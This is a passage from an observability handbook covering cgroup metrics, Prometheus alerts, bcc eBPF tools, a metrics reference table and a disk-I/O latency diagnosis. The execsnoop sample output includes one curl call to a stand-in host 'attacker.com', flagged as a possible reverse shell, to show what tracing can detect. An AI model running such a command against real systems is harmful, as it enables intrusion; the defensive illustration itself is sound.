throttled # Memory statistics cat /sys/fs/cgroup/kubepods/pod<uid>/<container-id>/memory.stat # anon 1234567890 ← Anonymous memory (heap, stack) # file 2345678901 ← File-backed memory (mmap, page cache) # sock 123456 ← Socket buffers # shmem 0 # inactive_anon 234567890 # active_anon 1000000000 # inactive_file 1234567890 # active_file 1111111011 # oom_kill 0 ← OOM kills (should always be 0) ``` **CPU throttling** — indicated by `nr_throttled` and `throttled_usec` in `cpu.stat` — is the cgroup-level equivalent of CPU saturation. When a container's CPU limit is set too low for its workload, the kernel throttles it: processes are suspended even though CPUs are idle elsewhere. This manifests as elevated application latency without any corresponding CPU utilization metric increase. It is one of the most common causes of unexplained latency in Kubernetes. Prometheus metric via cadvisor: ```promql # CPU throttling ratio per container rate(container_cpu_cfs_throttled_seconds_total{namespace="payments"}[5m]) / rate(container_cpu_cfs_periods_total{namespace="payments"}[5m]) # Alert on high CPU throttling - alert: ContainerCPUThrottling expr: | rate(container_cpu_cfs_throttled_seconds_total[5m]) / rate(container_cpu_cfs_periods_total[5m]) > 0.25 for: 5m labels: severity: warning annotations: summary: "Container {{ $labels.container }} in {{ $labels.namespace }} throttled >25%" description: "CPU limit is too low for this workload. Consider increasing the CPU limit or optimizing the application." ``` ### eBPF for Deep Linux Observability eBPF enables Linux system observability at a depth not achievable with traditional tools: **execsnoop** — traces every process execution system-wide: ```bash /usr/share/bcc/tools/execsnoop # PCOMM PID PPID RET ARGS # sh 1234 1233 0 /bin/sh -c curl -s http://... ← unexpected curl from container # curl 1235 1234 0 curl -s http://attacker.com ← potential reverse shell ``` **opensnoop** — traces every file open call: ```bash /usr/share/bcc/tools/opensnoop -p $(pgrep payment-service) # PID COMM FD ERR PATH # 1234 payment 10 0 /etc/ssl/certs/ca-certificates.crt # 1234 payment 11 0 /app/config/database.yaml # 1234 payment -1 2 /app/config/secrets.yaml ← ENOENT - missing file ``` **biolatency** — I/O latency histogram at the block device level: ```bash /usr/share/bcc/tools/biolatency -D # Tracing block device I/O... Hit Ctrl-C to end. # nvme0n1 # usecs : count distribution # 0 -> 1 : 0 | | # 2 -> 3 : 45 |**** | # 4 -> 7 : 3456 |**********************| # 8 -> 15 : 12345 |********************| # 16 -> 31 : 4567 |**** | # 256 -> 511 : 123 |* | ← outliers: worth investigating # 1024 -> 2047 : 12 | | ``` **syscount** — system call rate by type: ```bash /usr/share/bcc/tools/syscount -p $(pgrep payment-service) # SYSCALL COUNT # epoll_wait 45678 # read 23456 # write 12345 # sendto 8901 # recvfrom 8765 # futex 23456 ← high futex count may indicate lock contention ``` **Integration with Prometheus via eBPF exporter:** All the above bcc tools produce output suitable for ad-hoc investigation. For continuous monitoring and alerting, the ebpf_exporter (Cloudflare) converts eBPF metrics to Prometheus format, and tools like Parca and Pyroscope continuously profile processes and store profiling data as time series alongside metrics. ### Linux Observability Architecture The complete Linux observability stack, showing how kernel telemetry flows to Prometheus and Grafana: ``` ┌─────────────────────────────────────────────────────┐ │ Linux Kernel │ │ │ │ ┌──────────┐ ┌──────────┐ ┌────────────────┐ │ │ │ /proc │ │ cgroups │ │ eBPF subsystem│ │ │ │ /sys │ │ v2 │ │ (kprobes, │ │ │ │ /dev │ │ │ │ tracepoints) │ │ │ └─────┬────┘ └────┬─────┘ └───────┬────────┘ │ └────────┼────────────┼────────────────┼─────────────┘ │ │ │ ▼ ▼ ▼ ┌─────────────────────────────────────────────────────┐ │ Collection Layer │ │ │ │ node_exporter cAdvisor ebpf_exporter│ │ (reads /proc, (reads cgroup (attaches eBPF│ │ /sys, /dev) metrics) programs) │ │ │ │ │ │ │ └───────────────────┴───────────────────┘ │ │ │ │ │ /metrics HTTP endpoint │ └───────────────────────────┼──────────────────────────┘ │ │ Prometheus scrape (pull) ▼ ┌─────────────────────────────────────────────────────┐ │ Prometheus │ │ │ │ Stores time series │ │ Evaluates alert rules │ │ Exposes HTTP API │ └───────────────────────────┬─────────────────────────┘ │ ┌─────────────┼─────────────┐ ▼ ▼ ▼ Grafana Alertmanager Remote Write (dashboards) (routing) → Mimir ``` ### Linux System Observability Metrics Reference |Metric|Source in Kernel|node_exporter Metric|Classic Tool|Alert Threshold| |---|---|---|---|---| |CPU user%|`/proc/stat` user|`rate(node_cpu_seconds_total{mode="user"}[5m])`|top %us|> 80% sustained| |CPU system%|`/proc/stat` system|`rate(node_cpu_seconds_total{mode="system"}[5m])`|top %sy|> 30% (unexpected)| |CPU iowait%|`/proc/stat` iowait|`rate(node_cpu_seconds_total{mode="iowait"}[5m])`|top %wa|> 20%| |CPU steal%|`/proc/stat` steal|`rate(node_cpu_seconds_total{mode="steal"}[5m])`|top %st|> 5% (VM host overload)| |Load average 1m|`/proc/loadavg`|`node_load1`|uptime, top|> CPU count| |Memory available|`/proc/meminfo`|`node_memory_MemAvailable_bytes`|free -m|< 10% of total| |Memory used%|`/proc/meminfo`|`1 - node_memory_MemAvailable_bytes / node_memory_MemTotal_bytes`|free -m|> 90%| |Swap used|`/proc/meminfo`|`node_memory_SwapTotal_bytes - node_memory_SwapFree_bytes`|free -m|> 0 in containers| |Page faults|`/proc/vmstat`|`rate(node_vmstat_pgmajfault[5m])`|vmstat|Major faults > 0 in prod| |Disk IOPS|`/proc/diskstats`|`rate(node_disk_reads_completed_total[5m])`|iostat r/s|Varies by device| |Disk latency|`/proc/diskstats`|Derived: io_time / (reads+writes)|iostat await|> 20ms for SSD| |Disk util%|`/proc/diskstats`|`rate(node_disk_io_time_seconds_total[5m])`|iostat %util|> 80% sustained| |Filesystem used%|`statfs()` syscall|`1 - node_filesystem_avail_bytes / node_filesystem_size_bytes`|df -h|> 85%| |inode used%|`statfs()` syscall|`1 - node_filesystem_files_free / node_filesystem_files`|df -i|> 90%| |Network RX rate|`/proc/net/dev`|`rate(node_network_receive_bytes_total[5m])`|sar -n DEV|Near NIC capacity| |Network TX rate|`/proc/net/dev`|`rate(node_network_transmit_bytes_total[5m])`|sar -n DEV|Near NIC capacity| |Network errors|`/proc/net/dev`|`rate(node_network_receive_errs_total[5m])`|ip -s link|> 0| |TCP retransmits|`/proc/net/snmp`|`rate(node_netstat_Tcp_RetransSegs[5m])`|ss -s|> 0.1% of segments| |conntrack entries|`/proc/sys/net/netfilter`|`node_nf_conntrack_entries`|conntrack -L|> 75% of max| |Open file descriptors|`/proc/sys/fs/file-nr`|`node_filefd_allocated`|lsof -N|> 70% of max| |Processes in D state|`/proc/[pid]/status`|`node_procs_blocked`|ps aux|> 0 (investigate cause)| |Zombie processes|`/proc/[pid]/status`|`node_procs_zombies`|ps aux|> 5| |CPU throttling|cgroups v2 `cpu.stat`|`rate(container_cpu_cfs_throttled_seconds_total[5m])`|cat cpu.stat|> 25% of periods| |Container OOM kills|cgroups v2|`kube_pod_container_status_last_terminated_reason == "OOMKilled"`|kubectl describe pod|> 0| ### Production Scenario: Diagnosing Mysterious Application Latency A payment service's p99 latency increases from 150ms to 800ms at 14:00. No deployment occurred. Error rate is unchanged. The following investigation uses Linux system observability to find the root cause. **Step 1: Correlate with system metrics at 14:00** ```promql # Was iowait elevated? rate(node_cpu_seconds_total{mode="iowait",instance=~"payment-node.*"}[5m]) # → Yes, jumped from 2% to 35% at 14:01 # Was load average elevated? node_load1{instance=~"payment-node.*"} # → Jumped from 4 to 18 at 14:01 (nodes have 8 CPUs — 2x load) ``` **Step 2: Correlate with disk metrics** ```promql # Disk utilization rate(node_disk_io_time_seconds_total{instance=~"payment-node.*"}[5m]) # → nvme0n1 at 98% utilization from 14:01 # Disk latency rate(node_disk_read_time_seconds_total{instance=~"payment-node.*"}[5m]) / rate(node_disk_reads_completed_total{instance=~"payment-node.*"}[5m]) # → Read latency 180ms (normal: 0.5ms) — severe disk I/O queuing ``` **Step 3: Identify which process is causing disk I/O** ```bash # On the affected node: iostat -x 1 | grep nvme0n1 # Confirm saturation # Identify top I/O processes iotop -bo --iter=5 # PID PRIO USER DISK READ DISK WRITE SWAPIN IO> COMMAND # 23456 be/4 root 0.00 B/s 98.50 M/s 0.00 % 99.94 % postgres: autovacuum worker [transactions] # 1234 be/4 app 1.23 M/s 456.0 KB/s 0.00 % 0.06 % payment-service ``` **Root cause identified:** PostgreSQL autovacuum running an aggressive vacuum on the `transactions` table is saturating the disk I/O subsystem. The payment-service database queries are queuing behind autovacuum I/O. Application latency is elevated not because the application or database query is slow, but because disk I/O is saturated by a background maintenance process. **Remediation:** Configure autovacuum cost limits (`autovacuum_vacuum_cost_delay`, `autovacuum_vacuum_cost_limit`) to rate-limit autovacuum I/O. Alternatively, schedule autovacuum for off-peak hours or move the PostgreSQL data directory to a higher-throughput storage device. This root cause would have been completely invisible to application-level observability. The database queries appeared slow; the application appeared healthy. Only Linux-level I/O observability (iowait metric, disk utilization, iotop) revealed the actual cause. --- ## Conclusion Building and operating a production-grade observability platform is a continuous engineering effort, not a one-time installation. The technologies covered in this handbook — Prometheus, Grafana, OpenTelemetry, Loki, Tempo, Mimir — are individually powerful and collectively form a complete observability system capable of operating at any scale, from a single service to a multi-cluster, multi-region distributed platform. Several principles should guide implementation decisions: **Instrument everything, store selectively.** Application code should emit comprehensive telemetry. The collection layer (OTel Collector) applies sampling, filtering, and aggregation to make storage costs proportional to value. **Correlation is the multiplier.** Metrics, logs, and traces are individually useful but are exponentially more powerful when correlated — trace IDs in logs, exemplars linking metrics to traces, log-to-trace navigation in Grafana. Design the instrumentation to support correlation from day one. **Observability is owned by application teams.** Platform teams provide the infrastructure; application teams define their SLOs, write their alert rules, build their dashboards, and maintain their runbooks. Centralized observability without distributed ownership creates bottlenecks and knowledge gaps. **Test the observability, not just the system.** Regularly validate that alerts fire when they should, that runbooks are accurate, and that traces propagate correctly across service boundaries. Observability infrastructure that is not tested will fail when it is most needed. **Treat observability as code.** Dashboard definitions, alert rules, recording rules, and OTel Collector configurations should all be in version control, reviewed, and deployed through the same CI/CD processes as application code. The engineer who builds observability infrastructure well gives their entire organization the ability to understand and improve their systems continuously. That capability — the ability to answer "what is happening and why?" for any system at any time — is the foundation of everything else in modern infrastructure operations. --- _Handbook version 1.0 — March 2026. Technology versions current as of Prometheus 2.50, Grafana 10.4, OpenTelemetry Collector Contrib 0.97, Grafana Loki 3.0, Grafana Tempo 2.4, Grafana Mimir 2.11. All configuration examples are illustrative and should be adapted to specific organizational requirements._